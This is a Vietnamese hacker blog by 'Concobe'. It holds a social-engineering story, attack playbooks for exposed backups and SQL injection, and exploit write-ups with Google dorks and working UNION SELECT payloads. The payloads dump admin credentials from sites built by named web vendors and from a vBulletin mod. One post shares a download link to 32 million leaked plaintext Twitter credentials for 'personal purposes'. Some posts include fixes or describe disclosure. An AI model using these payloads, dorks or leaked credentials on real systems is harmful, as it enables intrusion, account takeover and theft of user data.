Trong bữa trưa, ngoài trình bày và chia sẻ thì tôi cũng có "hỏi thăm" thêm những thông tin quản trị của hệ thống đó gồm những ai, họ làm gì và thông tin ra sao, để tôi có thêm chút cơ hội trong quá trình tấn công sau này tuy nhiên những thông tin này vẫn chỉ dừng lại ở mức để tham khảo  và vẫn chưa có thêm bất kỳ info nào giúp tôi có thể leo cao hơn vào hệ thống của anh ấy cả, tôi vẫn chưa từ bỏ, sau khi kết thúc bữa trưa, tôi và anh chia tay nhau, trên đoạn đường ngắn ngủi thì tôi cũng có gợi thêm vài điều để củng cố niềm tin và đẩy anh ấy tới suy nghĩ quyết định sẽ mở một tài khoản cho tôi truy cập vào hệ thống của anh ấy, thật tuyệt vời phải không các bạn?

Tuy nhiên với quyền của tài khoản tôi đang nắm giữ thì chỉ đủ để nắm rõ hơn thông tin về các thành viên admin đang quản trị hệ thống đó và tài khoản của tôi vẫn không làm gì được hơn, và lúc này tôi quyết định chơi bài ngửa.Tôi nêu hẳn ra những điểm nguy hiểm của một tài khoản full quyền sẽ làm được những gì, đi xa đến đâu, ảnh hưởng như thế nào và thuyết phục anh ấy gán full quyền cho tài khoản mà tôi đang giữ  để giúp anh kiểm tra ở tầng cao hơn vì có khi có người quản trị mắc sai lầm ở tầng này, vì tin tưởng tôi nên anh đã thực hiện việc này và hoàn toàn không nghi ngờ gì về tôi cả, vốn dĩ trước giờ tôi cũng toàn giúp anh và chưa hề phá phách gì nên niềm tin của anh đối với tôi là rất lớn, điều này đã quyết định sự thành công của toàn bộ quá trình tấn công của tôi với phương pháp Social engineering này.

Tôi dừng quá trình tấn công ngay sau khi tài khoản của tôi có đủ quyền vì tôi đã thành công trong phương pháp Social engineering, bởi vì với tài khoản full quyền này thì tôi hoàn toàn có thể tải lên mã độc và chiếm toàn quyền server nhưng đây chỉ là minh họa cho một hình thức tấn công phi kỹ thuật và tôi muốn trình bày ra để anh ấy nhận ra được điểm yếu và sai lầm của anh ấy trong quá trình bảo vệ thành quả của mình đã tạo ra.

Và tôi tin chắc rằng sau bài này, thì anh ấy sẽ không còn share cho tôi tài khoản nào nữa :D, tức là trong tương lai có thể tôi sẽ gặp phải nhiều khó khăn hơn trong quá trình pentest hệ thống khác của anh ấy, nhưng nếu điều ấy xảy ra thì tôi hoàn toàn vui vẻ và mừng rỡ vì anh ấy đã nhận ra được lỗ hổng của hệ thống anh ấy đang quản lý chính là vấn đền về niềm tin về con người và bị tôi khai thác.


Kết bài: Cho dù bạn tin tưởng ai đó thật nhiều thì cũng luôn tỉnh táo, đừng giao thông tin nhạy cảm cho người đó, nhất là ... mấy tên IT có máu hắc hiếc thì càng phải giữ thật kỹ kẻo,... lên báo đấy :D.

Concobe

Thứ Sáu, 24 tháng 3, 2017

Lộ tập tin sao lưu mã nguồn, một lỗ hổng nguy hiểm.


Thời gian gần đây khi pentest khá nhiều website mà tôi gặp được một phương thức duy nhất đó là scan các tập tin nhạy cảm, những tập tin sao lưu và luôn cả những công cụ sao lưu dữ liệu phổ biến thì tôi nhận thấy rằng tình trạng mắc lỗi bảo mật cơ bản này diễn ra khá phổ biến, có khoảng 45% những site mà tôi lên danh sách để thử tool tồn tại các điểm yếu dạng này.

Bình thường các admin, kỹ thuật viên thường không để ý đến những tập tin đã sao lưu toàn bộ mã nguồn cũng như CSDL và thông tin quan trọng của hệ thống đang chạy vì có thể do sơ xuất hoặc họ không nghĩ rằng những file sao lưu đó không ảnh hưởng gì hoặc đơn giản là họ suy nghĩ trang web của họ có ai thèm dòm ngó,....

Nhưng đối với một hacker thì đây lại là một nguồn thông tin vô cùng quý giá và sẽ giúp họ giảm thiểu được rất rât nhiều công sức mới có thể có được những thông tin quan trọng như thế, và đương nhiên họ sẽ sử dụng triệt để những thông tin này để leo lên nắm quyền cao nhất mà họ có thể tận dụng và rồi tất nhiên người tổn hại chính là những victim bất cẩn đó.

Tôi sẽ phân tích những điểm yếu khi các bạn để lộ một trong những thông tin quan trọng dưới đây và mức độ ảnh hưởng khi kết hợp lại với nhau ra sao.

1. Lộ toàn bộ mã nguồn khi backup source và không xóa sau khi đã tải về máy để lưu trữ.
Ở tình huống này thì những thông tin mà các bạn bị lộ là toàn bộ và chẳng còn gì để mất nữa cả :)

- Với thông tin này thì tôi sẽ xem xét đến các thông tin quan trọng trong các tập tin lưu cấu hình kết nối đến CSDL của các bạn.Sau đó tôi sẽ dùng những thông tin đó để thử kết nối đến CSDL các bạn đang sử dụng qua những công cụ có sẵn vd: phpMyAdmin trên server nếu các bạn có cài đặt nó và cho phép truy cập, hoặc các bạn open port cũng như cho phép connect vào CSDL từ bên ngoài.Đến đây thì tôi hoàn toàn có thể chiếm quyền quản trị của bất kỳ người admin nào, hoặc bất kỳ thành viên nào đang tồn tại trên hệ thống của các bạn, chưa kể nếu các bạn gán đầy đủ quyền cho user quản trị CSDL đang sài, hoặc sử dụng user có quyền cao nhất là root thì khả năng chiếm được server các bạn sẽ tăng lên trên 90%.

- Ngoài ra tôi cũng sẽ tận dụng những thông tin như username, password các bạn tạo cho việc connect vào CSDL đó để thử kết nối vào một số dịch vụ quan trọng khác như SSH, FTP, Panel, Email,...Nếu may mắn mỉm cười vì các bạn sài chung mật khẩu cho các dịch vụ đó thì các bạn lại gặp nguy hiểm nhanh hơn.

- Cũng có thể trong mã nguồn sẽ kèm theo luôn cả bản sao lưu của Database trang web các bạn, và đây lại là một nguồn thông tin quý giá cho tôi khai thác, trong tình huống này tôi sẽ select ra những thông tin của người quản trị và tiến hành giải mã những mật khẩu đã được mã hóa để đăng nhập vào quyền quản trị rồi leo cao hơn để vào server các bạn.

2. Lộ toàn bộ mã nguồn khi backup source nhưng không có thông tin nào tận dụng được như ở mục số 1.

Với tình huống này thì có thể các bạn không sao lưu CSDL của các bạn, hay thông tin trong các tập tin cấu hình không sử dụng được để kết nối từ ngoài vào thì xem như các bạn có chút may mắn rồi, tuy nhiên mọi việc vẫn chưa dừng lại đây vì khi đã có được mã nguồn của các bạn tôi sẽ tiếp tục đào sâu hơn và tìm kiếm những lỗ hổng trong mã nguồn trang web của các bạn rồi tận dụng nó để tiếp tục tấn công leo cao hơn.
Ngoài ra nếu các bạn sài chung với vài trang web khác trên cùng một server thì tôi cũng có thể tận dụng thông tin kết nối CSDL đó sau khi đã khai thác vào được một trang nằm cùng server và lúc này thì có lẽ tôi không còn tốn công để local qua host các bạn mà chỉ việc kết nối thẳng đến CSDL của các bạn bởi lúc này tôi đã có quyền quản lý trên hệ thống (local) của các bạn rồi.

3. Kết luận và giải pháp.
Tóm lại như các bạn đã đọc ở mục 1 & 2 thì tôi đã gợi ý ra những hướng tấn công lợi dụng vào một điểm yếu duy nhất của các bạn là để lại tập tin backup mã nguồn và tôi phát hiện thấy, và kết quả thì các bạn cũng có thể thấy rõ rồi.Cách khắc phục thì cũng khá rõ ràng rồi đó là:

- Không sao lưu mã nguồn và để lại ngay trên server của mình với tên tập tin quá dễ đoán vd: tendomain.zip, public_html.zip, html.zip,...
- Không sử dụng chung mật khẩu quản trị CSDL cho nhiều dịch vụ khác vd: SSH, FTP, Admin, Email,...
- Hạn chế sử dụng các công cụ hỗ trợ quản trị CSDL với cài đặt và sử dụng mặc định, vd: phpMyAdmin có thể đổi thành tên truy cập mà chỉ có mình bạn biết.
- Không mở quyền cho truy cập trực tiếp từ ngoài vào CSDL của các bạn vd: chỉ cho kết nối vào CSDL ở localhost.
- Thay đổi lại toàn bộ thông tin quan trọng trên hệ thống vd: username, password của toàn bộ dịch vụ, kiểm thử lại mã nguồn để tránh bị găm mã độc,...
- Gởi lời cảm ơn đến người đã thông báo lỗ hổng cho các bạn, vì biết đâu một ngày nào đó họ sẽ lại thông báo cho bạn một lỗ hổng mới của các bạn.

Concobe

Thứ Tư, 22 tháng 3, 2017

Kịch bản tấn công vào một hệ thống với lỗ hổng SQL Injection

Đây là một tình huống thực tế và cũng khá phổ biến khi kiểm thử những hệ thống lớn và nhỏ tại VN mà tôi rút ra được, hôm nay cũng chia sẻ một phần nhỏ của quá trình pentest và những hướng xử lý phù hợp khi gặp, hoặc những bạn nào đang bí ý tưởng có thể tham khảo.

1. Hệ thống có website tồn tại lỗ hổng SQLi với quyền quản trị database là user không full quyền.
2. Hệ thống có website tồn tại lỗ hổng SQLi với quyền quản trị database là root hoặc user full quyền.
3. Hướng khắc phục dựa vào những điểm yếu ở trên.


Chúng ta bắt đầu đi vào chi tiết của từng mục.

1. Hệ thống có website tồn tại lỗ hổng SQLi với quyền quản trị database là user không full quyền.
Đây là tình huống gần như là tuyệt đối khi victim tồn tại lỗ hổng SQLi rồi, vì đại đa số các trang web thường sử dụng các dịch vụ share hosting và những nhà cung cấp dịch vụ này hiển nhiên không bao giờ cấp full quyền cho các bạn cả, và lúc này chúng ta sẽ phải tận dụng tối đa những thông tin mà chúng ta thu gom được trong quá trình khai thác lỗi SQLi và trong quá trình thu gom thông tin victim để tổng hợp những thông tin chính yếu, quan trọng để xử lý.

Với trường hợp này thì theo Concobe có lẽ tùy vào mục đích của mỗi người lúc đó sẽ có nhu cầu khai thác tới đâu, vd các bạn chỉ cần select được những thông tin lưu trữ trong database thì đến đây các bạn đã hoàn toàn thành công khi tìm được lỗ hổng SQLi, nhưng với những ai pentest và những ai có nhu cầu cao hơn, muốn chiếm được càng nhiều thông tin và quyền quản trị của victim càng tốt thì sẽ phải tiếp tục sử dụng những thông tin có được.

Mình thường tổng hợp các thông tin và dùng các công cụ để tạo ra một bộ từ điển tạm gọi là sát nhất với những thông tin của victim mà mình có được, sau đó mình sẽ dùng các công cụ để brute-force những mật khẩu của victim dựa vào bộ wordlist mới generate đó.Nếu may mắn thì các bạn có thể có được mật khẩu và đăng nhập vào khu vực quản trị của admin để bắt đầu upload lên server victim cái mà các bạn muốn upload (các bạn hiểu ý tôi rồi chứ :v ).

Còn lỡ như hôm đó các bạn mới ăn cơm hay bún,...với mực thì có lẽ các bạn nên để qua hôm sau hãy tiến hành brute-force vì theo kinh nghiệm của tôi thì nó đen thật đấy =]].Nói chơi cho vui thôi chứ không ra thì chịu chứ biết làm sao giờ?
Nói chứ đến đây cũng không hẳn là tịt hoàn toàn đâu, các bạn cũng nên ngó kỹ qua mã nguồn và cách hoạt động cũng như thông tin trong các table của database đó, biết đâu lại có cách để reset password và mình select ra rồi may mắn mỉm cười thì sao.Nhớ nhé, đừng từ bỏ, chừng nào khó quá thì cho qua thôi.


2. Hệ thống có website tồn tại lỗ hổng SQLi với quyền quản trị database là root hoặc user full quyền.

a. Dùng trình duyệt và câu truy vấn SQLi để ghi file vào hệ thống.
Cũng như trên nhưng ở tình huống này chúng ta có một thông tin giúp quá trình pentest thuận lợi hơn để leo cao hơn bởi user quản lý Database nếu được gán (Grant) full quyền sẽ tương đương với user root của hệ quản trị csdl đó :D và có thêm hai quyền cho phép chúng ta load_file và into outfile.

Với Load_file chúng ta có thể tận dụng thông qua SQLi để load lên nội dung những file tồn tại trên hệ thống đó nếu những file đó không được cấu hình và phân quyền cẩn thận, mà đa phần theo mình thấy là load được, nhất là các file lưu cấu hình CSDL website, lưu cấu hình hệ thống để nắm rõ hệ thống đang sử dụng công nghệ nào và gồm những gì để chúng ta tiến hành ghi file vào hệ thống thông qua into outfile.

Với Into outfile thì sau khi chúng ta có thông tin từ quá trình load_file như đường dẫn các thư mục của website victim, thông tin user và mật khẩu quản trị csdl,... chúng ta dùng chính query để khai thác SQLi và tiến hành ghi file vào hệ thống, rồi chiếm full quyền.

b. Dùng trình duyệt kết hợp với công cụ quản trị CSDL để ghi file vào hệ thống.
Với cách này thì cũng hên xui là chính (có thể không tìm được thư mục cho phép ghi (chmod 777) file thì sao) nhưng mình vẫn nêu ra để các bạn có thêm hướng xử lý nếu gặp phải, sẽ giúp quá trình thực hiện nhanh hơn và linh hoạt hơn so với query trên trình duyệt để ghi file.

Nếu vô tình victim có sử dụng công cụ quản lý CSDL như phpMyAdmin thì các bạn dùng nó kết hợp với thông tin đã load được từ các file config gồm username password quản lý CSDL ở bước 1 để đăng nhập và thực thi các câu truy vấn cho dẽ dàng hơn.Ngoài ra các bạn cũng có thể dùng phpMyAdmin để tiến hành update CSDL để chiếm quyền của user quản trị dễ dàng hơn rồi vào khu vực quản trị website để upload cái cần upload :(.

Nếu vẫn không tồn tại phpMyAdmin thì các bạn cũng nên thử thêm các công cụ hỗ trợ remote connect từ ngoài vào CSDL như Navicat,... để thử vận may, vì đa phần hiện nay mặc định khi cài đặt các trình quản lý CSDL đều không cho phép connect từ ngoài vào vì lý do an toàn, nhưng dù gì cũng cùng đường rồi, thử đi biết đâu lúc cài đặt lão admin lười biếng chọn next, next, yes, yes hết thì sao :D

Tóm lại phần 1 & 2 đơn giản gồm có:
- Lỗi SQL injection.
- Không có full quyền, brute-force và tìm kiếm vận may.
- Có full quyền và dùng load_file và into outfile để upload hàng họ lên.
- Tận dụng những công cụ và thông tin có sẵn để tạo thuận tiện trong quá trình pentest.


3. Hướng khắc phục dựa vào những điểm yếu ở trên.
- Kiểm thử, giám sát và quản lý hệ thống liên tục để tìm kiếm lỗ hổng và fix theo hướng chủ động.
- Cấu hình và phân quyền chặt chẽ nhưng file cấu hình của hệ thống như file config chứa thông tin CSDL website, file cấu hình web, host,...
- Cấu hình và phân quyền chặt chẽ nhưng thư mục của hệ thống đặc biệt không phân quyền 777 cho thư mục để tránh bị ghi file vào.
- Không cho phép kết nối vào CSDL từ bên ngoài, không sử dụng mặc định các công cụ quản lý dữ liệu như phpMyAdmin.
- Ngày ngày thắp nhang khấn vái và làm việc thiện để không bị ai dòm ngó, hoặc có bị dòm ngó cũng được họ thông báo fix lỗi chứ không phá hoại, nhớ cảm ơn và ủng hộ những người đó nếu có điều kiện.

Concobe một chiều rảnh rỗi.

Thứ Sáu, 17 tháng 2, 2017

Link download 32 triệu tài khoản twitter bị hack và chia sẻ

Passwords for 32M Twitter accounts may have been hacked and leaked

There is yet another hack for users of popular social media sites to worry about. Hackers may have used malware to collect more than 32 million Twitter login credentials that are now being sold on the dark web. Twitter says that its systems have not been breached.
“We are confident that these usernames and credentials were not obtained by a Twitter data breach – our systems have not been breached. In fact, we’ve been working to help keep accounts protected by checking our data against what’s been shared from recent other password leaks,” a Twitter spokesperson said.

 
 Mấy ngày nay thông tin về việc 32 triệu tài khoản của twitter gồm email và mật khẩu dạng plaintext đang được rao bán trên chợ đen và được chia sẻ rộng rãi ở các trang web, facebook và các mạng xã hội, đây là vấn đề cấp bách và lớn cho những ai đang sử dụng Twitter hay mau chóng đổi mật khẩu của mình càng sớm càng tốt để tranh bị mất tài khoản, bên cạnh đó nếu bạn nào đang sử dụng chung một mật khẩu đó với các tài khoản khác thì cũng nhanh chóng đổi mật khẩu mới để thông tin cá nhân được an toàn.



Tuy nhiên theo thông tin chính thức từ Twitter thì những thông tin này do hacker dùng mã độc để thực hiện đánh cắp và tổng hợp lại và rao bán trên chợ đen chứ hệ thống chính của họ vẫn không bị tấn công và mọi thứ vẫn trong tầm kiểm soát.

Bên Twitter cũng có đưa ra biện pháp hạn chế rủi ro và giúp người dụng bảo vệ tài khoản của họ bằng cách kiểm tra những dữ liệu bị rò rỉ và dữ liệu trên hệ thống và thông báo đến những ai đang bị ảnh hưởng từ vụ rò rỉ này để họ khắc phục sớm nhất.

Cuối cùng tôi cũng chia sẻ link download 32 triệu tài khoản này gồm email - mật khẩu không mã hóa, để những ai có nhu cầu tìm hiểu và sử dụng tùy theo mục đích cá nhân. Link download tôi chia sẻ của một người nào đó đã chia sẻ lên mạng, không phải do tôi upload lên, các bạn nên kiểm tra trước khi sử dụng cho an toàn.


Link: https://mega.nz/#!pkJl2QQR!_nWYeIZCF4LGOh2k20Y9X9tl3YPz4_Y1DF4I7vdpKws
File name: Twitter.zip
728.3 MB

Concobe

Thứ Năm, 16 tháng 2, 2017

Tôi đã hack diễn đàn 5giay.vn sử dụng xenforo như thế nào.

Sáng 15-02-2017 trong lúc trao đổi ở hội kín của những thành viên coi nhau như là anh em từ thời XgR còn sống và vẫn âm thầm sống với nhau tới hiện tại, chúng tôi có nhận được một cái lỗ hổng của Xenforo, máu dồn đến nơi cần dồn và ngồi thử hàng với một số trang sài Xenforo lớn ở VN
kết quả cũng có khá nhiều trang mắc lỗ hổng này, trong đó có www.5giay.vn một trang web rao vặt lớn mà ai cũng biết.

Ngồi thử Inject vài câu truy vấn cơ bản và nhận ra là hệ thống không có cản lọc, chỉ cần dùng những gì cơ bản nhất của SQL Injection cũng có thể lấy được những thông tin cần thiết như:





user(), database(), version() : 5s_u1@memcachehaproxy.5giay.vn:5s_db1:5.6.24-log

Nhận thấy điều này có thể gây ảnh hưởng lớn đến hệ thống nên tôi select vài thông tin email của admin và soạn email thông báo để gởi cảnh báo lỗ hổng đến họ, lỗ hổng đã được fix vào ngày hôm sau và tôi nhân được email cảm ơn từ BQT diễn đàn 5giay.vn.




Những ai đang sử dụng mã nguồn Xenforo xin hãy ngay lập tức update mã nguồn của mình lên version mới nhất để tránh tổn thất, bởi exploit này cũng có khá nhiều người biết và đang sử dụng nó rồi.


Quá trình thông báo:
15-02-2017 : Phát hiện lỗ hổng.Thông báo tới BQT diễn đàn 5giay.vn
...
16-02-2017 : Bug được fix trong buổi sáng, chiều nhận được email reply cảm ơn.Confirm là bug đã được fix, viết bài lên blog.


Kiểm thử bởi Concobe

Thứ Tư, 8 tháng 2, 2017

Lỗi SQL injection của mod Fun Shop trên Vbulletin

Như đã hứa thì hôm nay mình sẽ cung cấp một cái bug của 1 mod cũng khá nhiều forum đang sử dụng bị dính lỗi SQL injection và có thể bị khai thác và chiếm quyền, dưới đây là thông tin lỗi:

Mod lỗi: Fun Shop - Hệ Thống Shop Vui Nhộn trên diễn đàn Vbulletin
Author: http://www.vietvbb.vn/up/showthread.php?t=43945
version: All
Dork: inurl:/fshop.php?do=buy&id=
link lỗi: /fshop.php?do=buy&id=SQL Injection
Exploit by: concobe & bula -VHB- huynhdegroup.net

Điều kiện bắt buộc phải có là:
1. victim có cài mod Fun Shop
2. Attacker phải có tài khoản trên victim và đã login vào.


Query giả sử id=6:

/fshop.php?do=buy&id=-6' union select 1,2,3,4,5,6,7,8,9,10-- -
cột lỗi gồm 5,6,7,8

lấy version() :

/fshop.php?do=buy&id=-6' union select 1,2,3,4,version(),6,7,8,9,10-- -

xxx xxx xxx

Đến đây thì có lẽ mọi người hoàn toàn có thể làm những gì mình cần rồi. Mình không ghi ra luôn tất cả những câu query để lấy những thông tin quan trọng mục đích để mọi người tự query và làm phần còn lại để hiểu hơn những gì mình cần làm.

Một số server sẽ có chặn và lọc các truy vấn nguy hiểm nên mọi người có thể dùng thêm những cách bypass khi SQL injection thông thường là sẽ làm được.

Fix lỗi:
- Mở mã nguồn 2 file bên dưới

fshop/fshop_dobuy.php
fshop/ fshop_eventid.php

Tim:
 
$query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "fshop_items WHERE id='$_GET[id]'");  
$infoitem = $vbulletin->db->fetch_array($query);
$iditem = $_GET['id'];

Thay bằng:
 
$iditem = (int)$_GET['id'];
$query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "fshop_items WHERE id='$iditem'");  
$infoitem = $vbulletin->db->fetch_array($query);
/*fixed by ccb*/

Exploit by: concobe & bula -VHB- huynhdegroup.net

P/s: Exploit này tuy mình đã public từ rất lâu rồi nhưng đến nay vẫn còn một số không ít các diễn đàn vẫn sử dụng mod này và lỗ hổng vẫn còn tồn tại, điều này thật tệ.

Exploit website sài mã nguồn của cty Quảng Cáo Đại Thống​

# Thông tin Lỗi: SQL Injection các website sài mã nguồn của cty Quảng Cáo Đại Thống
# Nhà phát triển: Thiết kế web: Quảng Cáo Đại Thống - http://daithong.com.vn/
# Chức năng: Website sài mã nguồn PHP của cty Quảng Cáo Đại Thống
# Phiên bản lỗi: Tất cả các phiên bản, trừ các version sau này sài mã nguồn khác.
# Dork: "Thiết kế web: Quảng Cáo Đại Thống"
# Phát hiện bởi: Concobe.
# Ngày phát hiện: 18-06-2014

Rất nhiều website bị lỗ hổng này do sài chung một mã nguồn cho cty này tạo ra và không có lọc cũng như ràng buộc các truy vấn trong code, và lượng khách hàng cũng không ít :(

Chi tiết lỗ hổng:
1. Dính lỗi SQL injection ở phần danh mục catid=
2. Path quản trị mặc định /quanly/
3. Victim demo:


1. Dính lỗi SQL injection ở phần danh mục catid=

Select user, version, database name:

/index.php?page=news&catid=-1 union select 1,group_concat(user(),0x3a,version(),0x3a,database()),3,4,5-- -

Select table name:

/index.php?page=news&catid=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -

Select column name: admin

/index.php?page=news&catid=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646d696e-- -

Select info: column: Id,Username,Password,Status,LastLogin

/index.php?page=news&catid=-1 union select 1,group_concat(Id,0x3a,Username,0x3a,Password),3,4,5 from admin-- -


2. Path quản trị mặc định /quanly/
Toàn bộ các code đã test thì đều có chung đường dẫn truy cập vào khu vực quản lý của admin đó là:

domain-victim.xyz/quanly

3. Victim demo:


Concobe

Exploit website sài mã nguồn của cty Mũi Tên Việt​

# Thông tin Lỗi: SQL Injection các website sài mã nguồn của cty Mũi Tên Việt
# Nhà phát triển: Thiết kế web: Mũi Tên Việt - http://www.vietarrow.com/
# Chức năng: Website sài mã nguồn PHP của cty Mũi Tên Việt
# Phiên bản lỗi: Tất cả các phiên bản, trừ các version sau này sài mã nguồn khác.
# Dork: "Designed by Viet Arrow"
# Phát hiện bởi: Concobe.
# Ngày phát hiện: 12-04-2011

Chi tiết thông tin cty này.

    Công Ty Trách Nhiệm Hữu Hạn Mũi Tên Việt ( Viet Arrow Co., LTD) là công ty phát triển phần mềm và công nghệ Internet, được sáng lập và lãnh đạo bởi các chuyên gia công nghệ và quản lý hàng đầu.

    Viet Arrow cung cấp sản phẩm và dịch vụ đa dạng cho khách hàng, bao gồm các ứng dụng trên Web, tích hợp hệ thống và tư vấn về các hệ thống Công nghệ thông tin. Với năng lực công nghệ, kinh nghiệm tư vấn quản lý, khả năng nắm bắt xu thế thị trường và nhận thức sâu sắc về chiến lược quốc gia trong việc phát triển CNTT nói chung và công nghệ phần mềm nói riêng, Viet Arrow đã đặt ra mục tiêu trở thành nhà cung cấp hàng đầu các giải pháp phần mềm cho các doanh nghiệp và tổ chức tại Việt Nam.

    Ngoài ra, với mong muốn tham gia vào ngành công nghiệp phần mềm nhằm góp phần tăng cường sức cạnh tranh của các công ty Việt Nam trước viễn cảnh hội nhập vào thị trừơng khu vực và toàn thế giới, Viet Arrow đã và đang tăng cường nghiên cứu phát triển để tạo cơ hội đưa sản phẩm ra thị trường nước ngoài với thương hiệu Việt Nam.

    Viet Arrow có thị trường trong lĩnh vực dịch vụ lập trình cho các khách hàng quốc tế (Mỹ, Canada, Đức, các nước Châu Âu, …) cũng như thị trường trong nước bao gồm các cơ quan Nhà nước, các tỉnh thành, các công ty nước ngoài và công ty Việt Nam. Công ty có đội ngũ lập trình viên có nhiều kinh nghiệm và tay nghề cao trong việc phát triển và triển khai các sản phẩm phần mềm lớn trong nước và quốc tế.

Rất nhiều website bị lỗ hổng này do sài chung một mã nguồn cho cty Mũi Tên Việt này tạo ra và không có lọc cũng như ràng buộc các truy vấn trong code, và vì cty này thành lập khá lâu từ lượng khách hàng cũng không ít :(

Chi tiết lỗ hổng:
1. Dính lỗi SQL injection ở phần danh mục, phần chi tiết sản phẩm,...
2. Victim demo:


/index.php?do=content&id=SQLi
/index.php?do=product&id=SQLi
/index.php?do=products&act=detail&id=SQLi

1. Dính lỗi SQL injection ở phần danh mục product&id=

Select user, version, database name:

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(user(),0x3a,version(),0x3a,database()),6,7,8,9-- -

Select table name:

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(table_name),6,7,8,9 from information_schema.tables where table_schema=database()-- --- -

Select column name: tt_admin

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(column_name),6,7,8,9 from information_schema.columns where table_name=0x74745f61646d696e-- -

Select info: column: id,username,password,email,right

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(Id,0x3a,Username,0x3a,Password,0x3a,email),6,7,8,9 from tt_admin-- -

Còn 2 phần nội dung và chi tiết sản phẩm các bạn tự khai thác he, nó cũng tương tự thôi.

/index.php?do=content&id=SQLi
/index.php?do=products&act=detail&id=SQLi

2. Victim demo:
- Vui lòng tìm kiếm và kiểm thử.

P/s: Giờ mới viết blog và public nên ,... thời gian có hơi sai lệch :3

Concobe

Cyberpanel và những lỗ hổng bảo mật đã fix.

Tầm đầu tháng 1/2019 mình thấy đi group nào chuyên về thiết kế website, bán hosting,...Của facebook cũng có những comment khuyên nhau sử dụn...